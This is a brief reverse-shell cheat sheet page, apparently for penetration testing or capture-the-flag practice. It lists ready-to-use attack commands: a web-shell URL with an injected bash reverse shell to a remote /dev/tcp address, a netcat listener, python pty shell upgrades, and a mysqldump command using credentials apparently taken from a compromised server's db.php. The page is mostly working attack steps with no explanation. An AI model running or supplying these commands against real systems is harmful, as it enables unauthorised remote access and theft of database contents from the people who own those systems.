Reverse Shell CheatSheet
CMD. PHP.NetCat (Apache server) user or root
which python
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
http:http://10.10.10.5/images/uploads/avatar.php.png?cmd=bash -c 'bash -i >%26 /dev/tcp/10.10.14.20/443 0>%261'
nc -lvpn 443
mysql dump commands (password , username from db.php or db page
mysqldump --user=these --password=iheseus --host=localhost Magic7777
Details reference link:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
MSFVenom Cheatsheet
Details references link:
Last updated
Was this helpful?